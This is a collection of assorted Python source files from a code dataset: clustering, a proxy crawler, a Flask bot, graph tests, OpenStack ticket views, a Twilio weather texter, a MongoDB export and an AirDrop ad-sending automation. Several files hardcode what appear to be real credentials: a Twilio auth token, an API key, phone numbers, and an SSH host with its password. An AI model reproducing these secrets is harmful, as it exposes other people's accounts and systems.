sqrt((sum(euklid))/len(euklid))\n else:\n return 999\n\n\n def cluster_distance(self, c1, c2):\n \"\"\"Razdalja med dvema clustroma\"\"\"\n l = []\n for a,b in product(c1,c2): #iteriramo cez vse pare drzav v clustrih c1 in c2\n l.append(self.column_distance(self.dataArray[a], self.dataArray[b]))\n return self.linkage(l) #vrnemo najkrajso razdaljo glede na vrednost v self.linkage\n\n\n def closest_clusters(self):\n \"\"\"Vrne najblizja clustra\"\"\"\n # 1 vrstica, nekaj podobnega temu spodaj\n dist, d = min((self.cluster_distance(*c), c) #iteriramo cez vse pare clustroc in poisemo minimalni par\n for c in combinations(self.clusters, 2))\n return d #vrne par clustrov ki sta najblizja\n\n\n\n def run(self, st_clustrov):\n \"\"\"Izvajanje hierarhicnega clusteringa\"\"\"\n while len(self.clusters) > st_clustrov:\n pair = self.closest_clusters()\n self.clusters = [x for x in self.clusters if x not in pair] + [pair[0] + pair[1]]\n for l in self.clusters:\n for c in l:\n print(self.drzave[c])\n print(\"************\")\n\n\nhc = Clustering(\"eurovision-final.csv\")\nhc.run(3)\n","sub_path":"1. domaca naloga/1. domaca naloga.py","file_name":"1. domaca naloga.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"60582728","text":"#!/usr/bin/env python\n\n'''\nCruzer crawler\n'''\nimport pathlib\nimport logging\nfrom tqdm import tqdm\nfrom subprocess import check_output\nimport time\nimport asyncio\n\n\nimport cocrawler\nfrom cocrawler.task import Task\nfrom cocrawler.req import Req\nfrom cocrawler.urls import URL\nfrom cocrawler.proxy import CruzerProxy, TaskProxy, ProxyChecker, BadProxySignal\nfrom _BIN.tools.logs import Counter\n\n\nclass Dispatcher():\n\n def __init__(self):\n\n self.selector = ['aaaa','aqaa']\n\n self.sel_iter = iter(self.selector)\n self.total = self.get_total()\n\n def __iter__(self):\n return self\n\n def get_total(self):\n return 99\n total = self.selector.count()\n print('--> records selected: {0}'.format(total))\n return total\n\n def __next__(self):\n row = next(self.sel_iter)\n return (row)\n\nclass Cruzer(CruzerProxy):\n\n proxy_task_status = TaskProxy() # do not use task_proxy for name\n cond_html = ('____q' in proxy_task_status.doc.html) # validation condition\n\n checker_status = ProxyChecker(*proxy_task_status.get_cmd(),\n condition=any,\n apply_for_task='all'\n )\n\n proxy_task_body = TaskProxy(need=False) # reverse decision to false, no 'body' should be in html in this example\n body_exp = ('body222' in proxy_task_status.doc.html) # validation condition\n\n checker_body = ProxyChecker(*proxy_task_body.get_cmd(),\n condition=any,\n apply_for_task=['task_download']\n )\n\n#class Cruzer(cocrawler.Crawler):\n\n def task_generator(self):\n\n dis = Dispatcher()\n counter = Counter(dis.total, report_every=10)\n\n for host in dis:\n url = 'http://{0}'.format(host)\n url = 'https://www.google.com'\n counter.count()\n proxy_url = self.proxy_url(url)\n req = Req(proxy_url)\n domain = req.url.hostname_without_www\n\n yield Task(name='download',req=req,domain=domain)\n break\n\n async def task_download(self,task):\n '''\n new proxy can be rotated directly from task by returning:\n return BadProxySignal('--> Proxy is dead bla bla')\n '''\n if task.doc.status == 200:\n\n print('good: {0} , last_url: {1}'.format(task.domain,task.last_url))\n print(task.host_ip)\n else:\n print('bad: {0}, error: {1}'.format(task.domain,task.doc.status))\n pass\n\n\nif __name__ == '__main__':\n '''\n command line args example: \n python3 cruzer.py\\\n --config Crawl.MaxWorkers:3\\\n --config Crawl.CPUControl:False\\\n --config Crawl.DumpMemory:True\\\n --loglevel INFO\\\n --reuse_session\n '''\n Cruzer.run()\n\n #misc()\n\n\n\n\n\n","sub_path":"scripts/cruzer_proxy.py","file_name":"cruzer_proxy.py","file_ext":"py","file_size_in_byte":2867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"128180049","text":"from flask import Flask, request\n\n# Create your app (web server)\napp = Flask(__name__)\n\nx= 1\n\n# When people visit the home page '/' use the hello_world function\n@app.route('/')\ndef hello_world():\n return 'Hello, World!'\n\n@app.route('/greet', methods=['GET','POST'])\ndef greet_person():\n # Get the value of the 'name' query parameter\n # request.values is a dictionary (cool!)\n name = request.values.get('text')\n # This bot says hi to every name it gets sent!\n return f'hi {name}!'\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"demobot.py","file_name":"demobot.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"558259720","text":"\"\"\"\nIntro to Algo P537-538\n\nBreadth-first trees\nThe procedure BFS builds a breadth-first tree as it searches the graph,\nthe tree is represented by the PI field in each vertex.\n\nThe predecessor subgraph G(PI) is a breadth-first tree if V(PI) consists\nof vertices reachable from s and, for all v in V(PI), there is a unique\nsimple path from s to v in G(PI) that is also a shortest path from s\nto v in G.\n\n|E(PI)| = |V(PI)| - 1\n\nthe edges in E(PI) are called tree edges.\n\nsee exercises 22.2-7 P539\nthe diameter of a tree T = (V, E) is given by\nthe max of all the shortest path between u, v\nthe max of the height of the bfs tree for each v\n\n########################################################################\n\nsource of the test\n\nhttps://www.geeksforgeeks.org/shortest-path-unweighted-graph/\n\nSince the graph is unweighted, we can solve this problem in O(V + E)\ntime. The idea is to use a modified version of Breadth-first search in\nwhich we keep storing the predecessor of a given vertex while doing the\nbreadth first search. This algorithm will work even when negative weight\n cycles are present in the graph.\n\n\n add_edge(adj, 0, 1);\n add_edge(adj, 0, 3);\n add_edge(adj, 1, 2);\n add_edge(adj, 3, 4);\n add_edge(adj, 3, 7);\n add_edge(adj, 4, 5);\n add_edge(adj, 4, 6);\n add_edge(adj, 4, 7);\n add_edge(adj, 5, 6);\n add_edge(adj, 6, 7);\n int source = 0, dest = 7;\n printShortestDistance(adj, source, dest, v);\n return 0;\nShortest path length is : 2\nPath is::\n0 3 7\n\"\"\"\n\nimport unittest\n\nfrom plain_dag import PlainDag\nfrom bellman_ford_unweighted.v1 import find_shortest_path\n\n\nclass TestShortestPath(unittest.TestCase):\n\n def test_(self):\n node_by_value = dict()\n _ = PlainDag.create_from_string(\n \"\"\"\n 0->1\n 0->3\n 1->2\n 3->4\n 3->7\n 4->5\n 4->6\n 4->7\n 5->6\n 6->7\n \"\"\", o_dict=node_by_value\n )\n src = node_by_value['0']\n dest = node_by_value['7']\n p = find_shortest_path(src, dest)\n self.assertTrue(p)\n self.assertSequenceEqual(\n '037', ''.join([n.value for n in p])\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"graph/test_bellman_ford_unweighted.py","file_name":"test_bellman_ford_unweighted.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"512172710","text":"\"\"\"Various internal-only utility functions for seedy.\"\"\"\n\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport platform\n\n# The currently-running system.\n_system = platform.system()\n\ndef format_human_readable(size, precision=1):\n \"\"\"Format a byte count as a human-readable string.\n\n The conversion tries to respect the conventions of the running\n platform. For example, OS X (Darwin) systems define a KB as 1000B,\n while pretty much everyone else defines it as 1024B.\n\n :param: size a number specifying some number of bytes\n :type: size non-negative int, float, or convertible equivalent\n :return: a formatted human-readable string representing the input\n size\n \"\"\"\n\n # Set definition of suffixes, depending on the system.\n if _system == \"Darwin\":\n dividand = 1000.0\n else:\n dividand = 1024.0\n\n # Check sign of input.\n if size < 0:\n raise ValueError(\"Negative size (\" + str(size) + \").\")\n\n # Progressively step up through the suffixes.\n size = float(size)\n for suffix in ['B ','KB','MB','GB','TB','PB','EB','ZB']:\n if size < dividand:\n format_str = '\\%5.%sf\\%s' % str(precision)\n return format_str % (size, suffix)\n size /= dividand\n\n # Default to yottabytes. (What's it like in the future?)\n format_str = '\\%.%sf\\%s' % str(precision)\n return \"%.1f%s\" % (size, 'YB')\n","sub_path":"seedy/_utility.py","file_name":"_utility.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"627375434","text":"# Python script to prepare integration-prepare-gatkhc-v3.3.1-anyref files\n\n#Adjust file name for desired output name\nout = open(\"161107_integration-prepare-gatkhc-v3.3.2-anyref_ILMN_script.sh\", \"w\") \n\n#Set all of these values as appropriate \nHG = \"HG001\"\t\t#genome\nplat= \"Illumina\" #platform\nabv = \"Ilmn\" #abreviated platform name\ncc = \"150bp300x\" #chemistry and/or coverage\nmap = \"novoalign\" #mapper\nref = \"/assets/GRCh38hs38d1noalt.fasta-index.tar.gz\"\n\nchr = 1 \nfor i in range(22): \n\t\n\tout.write(\"dx run -y GIAB:/Workflow/integration-prepare-gatkhc-v3.3.2-anyref \" +\n\t \t\n\t\t\"-igvcf=/\"+HG+\"/GRCh38/\"+ plat +\"/GATKHC_output/\" + HG + \"_\" + str(chr) + \"_GRCh38_\" + map + \"_\" + cc + \"_GATKHC_gvcf.vcf.gz \" + \n\t\t\"-igvcftbi=/\"+HG+\"/GRCh38/\"+ plat +\"/GATKHC_output/\" + HG + \"_\" + str(chr) + \"_GRCh38_\" + map + \"_\" + cc + \"_GATKHC_gvcf.vcf.gz.tbi \" + \n\t\t#\"-iprefix=\" + HG + \"_\" + str(chr) + \"_GRCh38_\" + map + \"_\" + abv + cc + \"_\" + \"GATKHC \" +\n\t\t\"-iref=\" + ref + \" \" +\n\t\t\"-ichrom=chr\" + str(chr)+ \" \" +\n\t\t\"--destination=/\" + HG + \"/\" + \"GRCh38/\" + plat + \"/Integration_prepare_GATKHC_v.3.3.2/\" +\t\n\t\t\"\\n\") \n\t\n\tchr = chr+1 \n\nout.close()\t\n","sub_path":"NISTv3.3.2/DNAnexusCommands/batch_processing_commands/Batch_Processing_shell_scritps_GRCh38/GRCh38/HG001/integration-prepare-gatkhc-v3.3.2-anyref_ILMN_batch_script_GRCh38.py","file_name":"integration-prepare-gatkhc-v3.3.2-anyref_ILMN_batch_script_GRCh38.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"535986691","text":"import requests\n\nimport os\nfrom twilio.rest import Client\n\napi_key = \"e473e1b8f10b4ba7401a8b54e94bcf88\"\ncity = \"santa clara\"\ncountry = \"usa\"\n\nMY_LAT = 37.392727185\nMY_LONG = -121.9486459\n\n# Find your Account SID and Auth Token at twilio.com/console\n# and set the environment variables. See http://twil.io/secure\naccount_sid = 'AC22d36274c59681a3d827df9aa5df5cdb'\nauth_token = 'a43fc4450854e059ce2653237923cb66'\n\nweather_param = {\n 'lat': MY_LAT,\n 'lon': MY_LONG,\n 'exclude': \"hourly,minutely,daily,alerts\",\n 'appid': api_key\n}\n\nONECALL = 'https://api.openweathermap.org/data/2.5/onecall?'\n\nweather_info = requests.get(url=\"http://api.openweathermap.org/data/2.5/weather?q={},{}&appid={}\"\n .format(city, country, api_key))\n# print(weather_info.json())\n# one_call_api = requests.get(url=\"https://api.openweathermap.org/data/2.5/onecall?lat={}&lon={}&appid={}\"\n# .format(MY_LAT,MY_LONG,api_key))\n\none_call_api = requests.get(url=ONECALL, params=weather_param)\n\ncurrent_data = one_call_api.json()[\"current\"]\nprint(current_data)\n\n\ncurr_temp_C = round(current_data['temp']-273.15,2)\ncurr_feels_C = round(current_data['feels_like']-273.15,2)\nprint(curr_temp_C,curr_feels_C)\n\nclient = Client(account_sid, auth_token)\nmessage = client.messages \\\n .create(\n body=\"Your AIjeet says: Weather is {}\\u00b0C feels like {}\\u00b0C. Enjoy your run!!🏃‍♀️ \".format(curr_temp_C,curr_feels_C),\n from_='+12158834018',\n to='+14086031986'\n)\n\nprint(message.status,message.sid)\n\n# per_hour_id = []\n# for i in range(0, 12):\n# # print(hourly_data[i]['weather'][0]['id'])\n# per_hour_id.append(hourly_data[i]['weather'][0]['id'])\n#\n# print(per_hour_id)\n# for i in per_hour_id:\n# if i < 800:\n# print(\"Bring Umbrella\")\n\n# client = Client(account_sid, auth_token)\n# message = client.messages \\\n# .create(\n# body=\"Hey Sid, I am your AIjeet\",\n# from_='+12158834018',\n# to='+14086031986'\n# )\n#\n# print(message.sid)\n","sub_path":"rain_check.py","file_name":"rain_check.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"412259670","text":"from sshtunnel import SSHTunnelForwarder\nfrom pymongo import MongoClient\nimport csv,os, datetime\nimport pandas as pd\n\nMONGO_HOST = \"20.186.46.96\"\nMONGO_USER = \"armada\"\nMONGO_PASS = \"ArmUt1lW3b0424\"\nMONGO_DB = \"cmt\"\nMONGO_COLLECTION = \"specialty\"\n\nserver = SSHTunnelForwarder(\n MONGO_HOST,\n ssh_username=MONGO_USER,\n ssh_password=MONGO_PASS,\n remote_bind_address=('127.0.0.1', 27017)\n)\n\nserver.start()\n\nconnection = MongoClient('127.0.0.1', server.local_bind_port)\ndb = connection[MONGO_DB]\n##collection = db[MONGO_COLLECTION]\n##print(connection.database_names())\n\n\n## TASK - pull only the values that were updated during the CMT v1\ndef pullDiffRows(wFile, specialtyId):\n cursor = db.diagnosis.find()\n \n with open(wFile, \"w\", newline='',encoding=\"utf-8\") as outfile:\n fields = [\"_id\",\"icd10Code\",\"icd10Name\",\"icd10Synonym\",\"cabSynonym\",\"clinicalIntakeTerm\",\"patientFacingTermIntake\",\n \"subspecialty\",\"clinicalFocus\",\"region\",\"grouper\",\"specialtyId\",\"createdAt\",\"updatedAt\",\"createdBy\",\"updatedBy\"]\n write = csv.DictWriter(outfile, fieldnames = fields)\n write.writeheader()\n for c in cursor:\n if c['specialtyId'] == specialtyId and isinstance(c[\"updatedAt\"], str) == False: \n c[\"icd10Code\"] = \"|\".join(c[\"icd10Code\"])\n c[\"icd10Name\"] = \"|\".join(c[\"icd10Name\"])\n c[\"icd10Synonym\"] = \"|\".join(c[\"icd10Synonym\"])\n c[\"cabSynonym\"] = \"|\".join(c[\"cabSynonym\"])\n c[\"clinicalIntakeTerm\"] = \"|\".join(c[\"clinicalIntakeTerm\"])\n c[\"patientFacingTermIntake\"] = \"|\".join(c[\"patientFacingTermIntake\"])\n c[\"subspecialty\"] = \"|\".join(c[\"subspecialty\"])\n c[\"clinicalFocus\"] = \"|\".join(c[\"clinicalFocus\"])\n c[\"region\"] = \"|\".join(c[\"region\"])\n c[\"grouper\"] = \"|\".join(c[\"grouper\"])\n write.writerow(c)\n df = pd.read_csv(wFile)\n print(df.shape)\n if df[\"icd10Code\"].count() == 0:\n os.remove(wFile)\n else:\n print(\"Wrote \"+ wFile)\n\ndef fullDump(wFile):\n cursor = db.diagnosis.find()\n with open(wFile, \"w\", newline='') as outfile:\n fields = [\"_id\",\"icd10Code\",\"icd10Name\",\"icd10Synonym\",\"cabSynonym\",\"clinicalIntakeTerm\",\"patientFacingTermIntake\",\n \"subspecialty\",\"clinicalFocus\",\"region\",\"grouper\",\"specialtyId\",\"createdAt\",\"updatedAt\",\"createdBy\",\"updatedBy\"]\n write = csv.DictWriter(outfile, fieldnames = fields)\n write.writeheader()\n for c in cursor:\n c[\"icd10Code\"] = \"|\".join(c[\"icd10Code\"])\n c[\"icd10Name\"] = \"|\".join(c[\"icd10Name\"])\n c[\"icd10Synonym\"] = \"|\".join(c[\"icd10Synonym\"])\n c[\"cabSynonym\"] = \"|\".join(c[\"cabSynonym\"])\n c[\"clinicalIntakeTerm\"] = \"|\".join(c[\"clinicalIntakeTerm\"])\n c[\"patientFacingTermIntake\"] = \"|\".join(c[\"patientFacingTermIntake\"])\n c[\"subspecialty\"] = \"|\".join(c[\"subspecialty\"])\n c[\"clinicalFocus\"] = \"|\".join(c[\"clinicalFocus\"])\n c[\"region\"] = \"|\".join(c[\"region\"])\n c[\"grouper\"] = \"|\".join(c[\"grouper\"])\n write.writerow(c)\n print(\"Wrote \"+ wFile)\n\n# ypcudw34p = Endo\n# tv00rkp52 = Ophtho\n# 9mwojwsy5 = Ortho\n# 8yahp90r7 = Peds Endo\n# v6jg8uzhn = Peds Ortho\noutputDir1 = \"output/MongoDump/\"\nwFile = [\"cmt_Endo.csv\",\"cmt_Ophtho.csv\",\"cmt_Ortho.csv\",\"cmt_EndoPeds.csv\",\"cmt_OrthoPeds.csv\"]\nspecialtyId = [\"ypcudw34p\",\"tv00rkp52\",\"9mwojwsy5\", \"8yahp90r7\",\"v6jg8uzhn\"]\nos.chdir(outputDir1)\nfullDump(\"diagnosis_v1.csv\")\nfor k,v in enumerate(specialtyId):\n pullDiffRows(wFile[k], v)\n\n# close ssh tunnel\nserver.stop()\n","sub_path":"ClinicalDocs_parser/readFromMongodb.py","file_name":"readFromMongodb.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"597580482","text":"# Copyright 2012 NEC Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\nViews for managing Neutron Networks.\n\"\"\"\nfrom django.core.urlresolvers import reverse\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom horizon import exceptions\nfrom horizon import forms\nfrom horizon import tables\nfrom horizon.utils import memoized\n\nfrom django.utils.datastructures import SortedDict\n\nimport ast\n\nimport json\n\nfrom openstack_dashboard import api\n\nfrom openstack_dashboard.contrib.custom.utils import timeutils\n\nfrom openstack_dashboard.contrib.custom.content.openstack_plus.tickets \\\n import forms as project_forms\nfrom openstack_dashboard.contrib.custom.content.openstack_plus.tickets \\\n import tables as project_tables\nfrom openstack_dashboard.contrib.custom.db import api as db_api\n\nfrom openstack_dashboard.dashboards.project.volumes.volumes import views\n\n\nclass IndexView(tables.DataTableView):\n table_class = project_tables.TicketsTable\n template_name = 'openstack_plus/tickets/index.html'\n\n @memoized.memoized_method\n def _get_tenant_list(self):\n try:\n tenants, has_more = api.keystone.tenant_list(self.request)\n except Exception:\n tenants = []\n msg = _('Unable to retrieve ticket project information.')\n exceptions.handle(self.request, msg)\n\n tenant_dict = SortedDict([(t.id, t) for t in tenants])\n return tenant_dict\n\n @memoized.memoized_method\n def _get_user_list(self):\n try:\n users = api.keystone.user_list(self.request)\n except Exception:\n users = []\n msg = _('Unable to retrieve ticket users information.')\n exceptions.handle(self.request, msg)\n\n user_dict = SortedDict([(u.id, u) for u in users])\n return user_dict\n\n def get_data(self):\n try:\n tickets = db_api.ticket_get_all(self.request)\n except Exception:\n tickets = []\n msg = _('Ticket list can not be retrieved.')\n exceptions.handle(self.request, msg)\n\n if tickets:\n tenant_dict = self._get_tenant_list()\n for ticket in tickets:\n tenant = tenant_dict.get(ticket['project_id'], None)\n ticket.tenant_name = getattr(tenant, 'name', None)\n user_dict = self._get_user_list()\n for ticket in tickets:\n user = user_dict.get(ticket['user_id'], None)\n ticket.user_name = getattr(user, 'name', None)\n\n return tickets\n\n\nclass UpdateView(forms.ModalFormView):\n form_class = project_forms.EditTicket\n template_name = 'openstack_plus/tickets/update.html'\n context_object_name = 'ticket'\n success_url = reverse_lazy(\"horizon:openstack_plus:tickets:index\")\n\n def get_context_data(self, **kwargs):\n context = super(UpdateView, self).get_context_data(**kwargs)\n context[\"ticket_id\"] = self.kwargs['ticket_id']\n ticket_id = self.kwargs['ticket_id']\n try:\n ticket = db_api.ticket_get_by_id(self.request, ticket_id)\n except Exception:\n ticket = None\n if ticket is not None:\n context[\"type\"] = ticket.type\n if ticket.type == \"quota\":\n context[\"ticket\"] = ast.literal_eval(ticket.context)\n elif ticket.type == \"volume\":\n volume = json.loads(ticket.context)\n context[\"volume\"] = volume\n try:\n if(volume[\"volume_source_type\"] == \"volume_source\"):\n volume = api.cinder.volume_get(\n self.request,\n volume[\"volume_source\"])\n context[\"volume_source\"] = volume\n elif(volume[\"volume_source_type\"] == \"image_source\"):\n image = api.glance.image_get(\n self.request,\n volume[\"image_source\"])\n context[\"volume_source\"] = image\n elif(volume[\"volume_source_type\"] == \"snapshot_source\"):\n snapshot = api.cinder.volume_snapshot_get(\n self.request,\n volume[\"snapshot_source\"])\n context[\"volume_source\"] = snapshot\n context[\"volume_source_error\"] = False\n except Exception:\n context[\"volume_source_error\"] = True\n elif ticket.type == \"instance\":\n context[\"instance\"] = json.loads(ticket.context)\n context[\"flavor\"] = api.nova.flavor_get(\n self.request, context[\"instance\"][\"flavor\"])\n elif ticket.type == \"resize_volume\":\n context[\"volume\"] = json.loads(ticket.context)\n elif ticket.type == \"resize_instance\":\n context[\"instance\"] = json.loads(ticket.context)\n else:\n # ticket.type == \"normal\"\n context[\"description\"] = ticket.description\n return context\n\n @memoized.memoized_method\n def _get_object(self, *args, **kwargs):\n ticket_id = self.kwargs['ticket_id']\n try:\n return db_api.ticket_get_by_id(self.request, ticket_id)\n except Exception:\n redirect = self.success_url\n msg = _('Unable to retrieve ticket details.')\n exceptions.handle(self.request, msg, redirect=redirect)\n\n def get_initial(self):\n ticket = self._get_object()\n return {'ticket_id': ticket['id']}\n\n\nclass CreateView(views.CreateView):\n def post(self, request, *args, **kwargs):\n ticket_id = self.kwargs['ticket_id']\n ticket = db_api.ticket_get_by_id(self.request, ticket_id)\n request.POST.update(json.loads(ticket.context))\n return super(CreateView, self).post(request, *args, **kwargs)\n\n\nclass Ticket(object):\n def __init__(self, id, title, description, status,\n status_desc, created_at):\n self.id = id\n self.title = title\n self.description = description\n self.status = status\n self.status_desc = status_desc\n self.created_at = created_at\n\n\nclass TicketReply(object):\n def __init__(self, id, user_id, create_time, content, user_name, is_admin):\n self.id = id\n self.user_id = user_id\n self.create_time = create_time\n self.content = content\n self.user_name = user_name\n self.is_admin = is_admin\n\n\nclass DetailView(forms.ModalFormView):\n form_class = project_forms.CreateForm\n template_name = 'openstack_plus/tickets/detail.html'\n success_url = \"horizon:openstack_plus:tickets:detail\"\n\n @memoized.memoized_method\n def _get_user_list(self):\n try:\n users = api.keystone.user_list(self.request)\n except Exception:\n users = []\n msg = _('Unable to retrieve ticket users information.')\n exceptions.handle(self.request, msg)\n\n user_dict = SortedDict([(u.id, u) for u in users])\n return user_dict\n\n def get_context_data(self, **kwargs):\n context = super(DetailView, self).get_context_data(**kwargs)\n ticket_id = self.kwargs['ticket_id']\n ticket_db = db_api.ticket_get_by_id(self.request, ticket_id)\n created_time = timeutils.format_time(ticket_db.created_at)\n status_desc = ticket_db.status.capitalize()\n ticket = Ticket(ticket_db.id, ticket_db.title, ticket_db.description,\n ticket_db.status, status_desc, created_time)\n all_ticket_reply = db_api.get_all_ticket_reply_by_ticket_id(\n self.request, ticket_id)\n reply_list = []\n user_dict = self._get_user_list()\n for reply in all_ticket_reply:\n created_time = timeutils.format_time(reply.created_at)\n user = user_dict.get(reply['user_id'], None)\n user_name = getattr(user, 'name', None)\n reply_list.append(TicketReply(reply.id, reply.user_id,\n created_time, reply.content,\n user_name, reply.is_admin))\n context[\"ticket\"] = ticket\n context[\"ticket_id\"] = ticket_id\n context[\"all_ticket_reply\"] = reply_list\n\n return context\n\n def get_initial(self):\n return {'ticket_id': self.kwargs[\"ticket_id\"]}\n\n def get_success_url(self, **kwargs):\n ticket_id = self.kwargs['ticket_id']\n return reverse(self.success_url,\n kwargs={\"ticket_id\": ticket_id})\n","sub_path":"openstack_dashboard/contrib/custom/content/openstack_plus/tickets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"461840959","text":"import pyautogui as gui\nimport screenSearch as ss\nimport utilities as utils\nimport terminal\nimport demos\nimport sys\n\n\n# from pynput.mouse import Listener\nfrom pynput import mouse\nfrom pynput import keyboard\n\n# KNOWN ISSUE: Due to MacOs Retina display, coordinates have to be divided by two...\n# Change iphone name = Settings>General>About>Name\n# Image is set to default since we are not friends\n\n# TODO: Keyboard input to quit\n\n# brew cask install xquartz\n# brew install wmctrl\n\n\nUL = 1\nLR = 2\nFILE = 3\nSTARTED = 4\n\nstate = UL\nul = None\nlr = None\nfile = None\n\n# Screen constants\nLISTBUTTON_LISTROW_Y = 55 # Number of pixels between the corner of the list button and the first list row\n\n\n\n\ndef nextState():\n\tglobal state\n\tstate += 1\n\n# Spin the system for timeWait number of seconds\ndef waitFor(timeWait):\n\tstartTime = time.time()\n\tendTime = startTime + timeWait\n\twhile time.time() < endTime:\n\t\tpass\n\ndef waitForState():\n\tif state == UL:\n\t\twhile ul is None:\n\t\t\tpass\n\telif state == LR:\n\t\twhile lr is None:\n\t\t\tpass\n\telif state == FILE:\n\t\twhile file is None:\n\t\t\tpass\n\tutils.waitFor(1)\n\ndef on_move(x, y):\n\tpass\ndef on_scroll(x, y, dx, dy):\n\tpass\n\ndef on_click(x, y, button, pressed):\n\tglobal ul\n\tglobal lr\n\tglobal file \n\tx = int(x)\n\ty = int(y)\n\tprint(\"x=\"+str(x)+\", y=\"+str(y))\n\tif state == UL:\n\t\tul = (x, y)\n\t\tprint(\"set\")\n\telif state == LR:\n\t\tlr = (x, y)\n\telif state == FILE:\n\t\tfile = (x, y)\n\nlistener = mouse.Listener(on_move=on_move, on_click=on_click, on_scroll=on_scroll)\nlistener.start()\n\n\n# def on_press(key):\n# try:\n# print('alphanumeric key ' + key.char + ' ' + str(type(key.char)) + ' pressed')\n# if key.char == 'q':\n# \tprint('here')\n# \tsys.exit(0)\n# \texit()\n# except AttributeError:\n# print('special key {0} pressed'.format(key))\n\n# def on_release(key):\n# \tpass\n# # print('{0} released'.format(\n# # key))\n# # if key == keyboard.Key.esc:\n# # # Stop listener\n# # return False\n\n# listener = keyboard.Listener(on_press=on_press, on_release=on_release)\n# listener.start()\n\n\n\n# Can be optimized by taking own screenshot and searching image for both locations together\ndef launchAirdrop():\n\tterminal.focusAirdropWindow()\n\tpositionAirdropWindow()\n\tresizeAirdropWindow()\n\ndef findAirdropGUI():\n\t# (left, top, width, height)\n\tairdropBoxCoor = None\n\twhile airdropBoxCoor is None:\n\t\tairdropBoxCoor = ss.locateOnScreen('images/dark/airdropHeader.png')\n\tbuttonsBoxCoor = None\n\twhile buttonsBoxCoor is None: \n\t\tbuttonsBoxCoor = ss.locateOnScreen('images/dark/upperLeftButtons.png')\n\treturn (airdropBoxCoor, buttonsBoxCoor)\n\ndef positionAirdropWindow():\n\tairdropBoxCoor, buttonsBoxCoor = findAirdropGUI()\n\t# Move window to upper left corner\n\tgrabCoor = gui.center(airdropBoxCoor)\n\t# Drag screen until red button touches left screen edge\n\tbufferX = grabCoor[0] - buttonsBoxCoor[0]\n\tgui.moveTo(grabCoor[0], grabCoor[1])\n\tgui.dragTo(bufferX, 0, button='left', duration=0.5)\n\ndef resizeAirdropWindow():\n\tairdropBoxCoor, buttonsBoxCoor = findAirdropGUI()\n\thalfWindowLength = gui.center(airdropBoxCoor)[0] - buttonsBoxCoor[0]\n\tedge = (gui.center(airdropBoxCoor)[0] + halfWindowLength, airdropBoxCoor[1])\n\tscreenWidth, _ = gui.size()\n\tgui.moveTo(edge[0], edge[1], duration=0.5)\n\tgui.dragTo(int(screenWidth/2), edge[1], button='left', duration=0.5)\n\n\n\n\n\n\ndef launchAdsDirectory():\n\tterminal.focusAdsDirectoryWindow()\n\tpositionAdsDirectoryWindow()\n\tresizeAdsDirectoryWindow()\n\ndef findAdsDirectoryGUI():\n\tadsBoxCoor = None\n\twhile adsBoxCoor is None:\n\t\tadsBoxCoor = ss.locateOnScreen('images/dark/adsDirHeader.png')\n\tbuttonsBoxCoor = None\n\twhile buttonsBoxCoor is None: \n\t\tbuttonsBoxCoor = ss.locateOnScreen('images/dark/upperLeftButtons.png')\n\treturn (adsBoxCoor, buttonsBoxCoor)\n\ndef positionAdsDirectoryWindow():\n\tadsBoxCoor, buttonsBoxCoor = findAdsDirectoryGUI()\n\t# (left, top, width, height)\n\tgrabCoor = gui.center(adsBoxCoor)\t\n\t# Half the length of the window\n\tlengthHalfWindow = grabCoor[0] - buttonsBoxCoor[0]\n\tscreenWidth, _ = gui.size()\n\tbufferX = screenWidth - lengthHalfWindow\n\tgui.moveTo(grabCoor[0], grabCoor[1])\n\tgui.dragTo(bufferX, 0, button='left', duration=0.5)\n\t# Now make sure items in the directory are in list mode\n\tlistButtonUnclickedCoor = ss.locateOnScreen('images/dark/adsListButtonUnclicked.png')\n\tif listButtonUnclickedCoor is not None:\n\t\tclickCoor = gui.center(listButtonUnclickedCoor)\n\t\tgui.moveTo(clickCoor[0], clickCoor[1])\n\t\tgui.mouseDown()\n\t\tgui.mouseUp()\n\ndef resizeAdsDirectoryWindow():\n\t_, buttonsBoxCoor = findAdsDirectoryGUI()\n\tedge = (buttonsBoxCoor[0] - 5, buttonsBoxCoor[1])\n\tscreenWidth, _ = gui.size()\n\tgui.moveTo(edge[0], edge[1], duration=0.5)\n\tgui.dragTo(int(screenWidth/2) + 10, edge[1], button='left', duration=0.5)\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef main():\n\tprint(\"Select the upper left corner of the airdrop window\")\n\twaitForState()\n\tnextState()\n\n\tprint(\"Select the lower right corner of the airdrop window\")\n\twaitForState()\n\tnextState()\n\n\tprint(\"Select your file\")\n\twaitForState()\n\tnextState()\n\n\tprint(\"ul = \" + str(ul))\n\tprint(\"lr = \" + str(lr))\n\tprint(\"file = \" + 